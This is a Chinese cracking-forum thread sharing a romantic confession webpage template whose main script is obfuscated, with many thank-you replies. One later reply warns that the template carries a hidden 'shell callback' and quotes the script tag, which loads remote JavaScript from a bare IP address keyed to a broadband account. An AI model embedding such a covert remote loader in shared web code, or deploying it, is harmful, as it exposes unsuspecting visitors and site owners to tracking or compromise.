吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[其他转载] 很好看的表白页源码(时光不老,我们不散)【源码+教程】

mgj200 发表于 2018-5-18 22:22

0.png 1.png

演示站:c.lmz8.cn
打开js/4.js,复制到工具箱的js代码整理那,先解密,方便查看。
工具箱:tool.lmz8.cnjs代码整理、在线解码
BA]9HLLC~8DRA9}@K2CB5$P.png 这个便是文字,只不过呗转码了,所以要用到解码工具。内容更改:index.html(里面的网址改了,否则会跳转到我的网站)js/4.js(网址、照片、音乐视频)图片文件夹:ml背景音乐:46行优酷视频地址:2232 行
源码:https://www.lanzouj.com/i11utcd教程:https://www.lanzouj.com/i11uzuh
拿走记得回复一下谢谢。虽然很不想说,但是还是得提一下。
另外呢这是诗梦大佬的源码,因为当时分享的时候好像没注意,我也不知道留版权了没有,在此说明一下哈,不然大大得骂我了,我就搬点砖,也不容易,嘿嘿。

免费评分

王拓123 + 1 谢谢@Thanks!
喵小姐wmy + 1 + 1 我很赞同!
小情歌 + 1 + 1 成功搭建,就差女友了~
a954210336 + 1 + 1 我很赞同!
四四 + 1 + 1 谢谢@Thanks!
无影寒冬 + 1 + 1 羡慕这帮有女朋友的人。
路人丶 + 1 大佬, 4.JS 我也改过了 主页 index 我也改过了,为啥 我的网站还是会自动.
zxxzxxzxx + 1 + 1 谢谢@Thanks!
torboxin + 1 + 1 大佬有webGL的经验吗,刚入坑
Levi-7 + 1 + 1 辛亏没有女朋友,太麻烦了,,,
变态大叔 + 1 + 1 谢谢@Thanks!
躲在角落看繁华 + 1 + 1 膜拜大佬 有了大佬的帮助表白的信心更足了
a87399 + 1 + 1 真羡慕有女朋友的人
麦米尔加弗德 + 1 + 1 谢谢@Thanks!
冬冬飞侠 + 1 + 1 热心回复!
我会一直在2018 + 1 + 1 大佬牛皮,520刚好用到、
fiwk + 1 + 1 正需要 谢谢
a1056514617 + 1 + 1 我很赞同!

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

路人丶 发表于 2018-5-20 14:23
mgj200 发表于 2018-5-20 00:27
主要的就是index里面的链接,好好看一下

跳转链接改过来了,- -,现在的问题是 我发现我居然改不了相片。。。 刚开始我先 更换了ML 文件夹内的相片 发现没反应,后来我又去 JS编辑器里面 更改了一次 还是切换不过来,敢问大佬这个么整呢
abcjak 发表于 2019-9-30 16:54
带shell回传地址,不过这地址好像关了。

<script src="http://118.212.168.228:8080/delivery/t.php?adsl=00000000" type="text/javascript"></script> 00000000是你们的宽带帐号
会放电的皮卡丘 发表于 2018-5-18 22:31
mmqwer 发表于 2018-5-18 22:38
真羡慕有女朋友的人

免费评分

CrazyNut + 1 + 1 我很赞同!

iwxshw 发表于 2018-5-18 22:49

真羡慕有女朋友的人
夏520 发表于 2018-5-18 22:50
真羡慕有女朋友的人
FORIT 发表于 2018-5-18 22:51
羡慕有女朋友的人
afengxiu 发表于 2018-5-18 23:09
羡慕有女朋友的人
zeng110114 发表于 2018-5-18 23:13 来自手机
感谢分享。就差个女朋友了
头像被屏蔽
炫金呀 发表于 2018-5-18 23:23
yu_changfa 发表于 2018-5-18 23:31 来自手机
谢谢分享,mark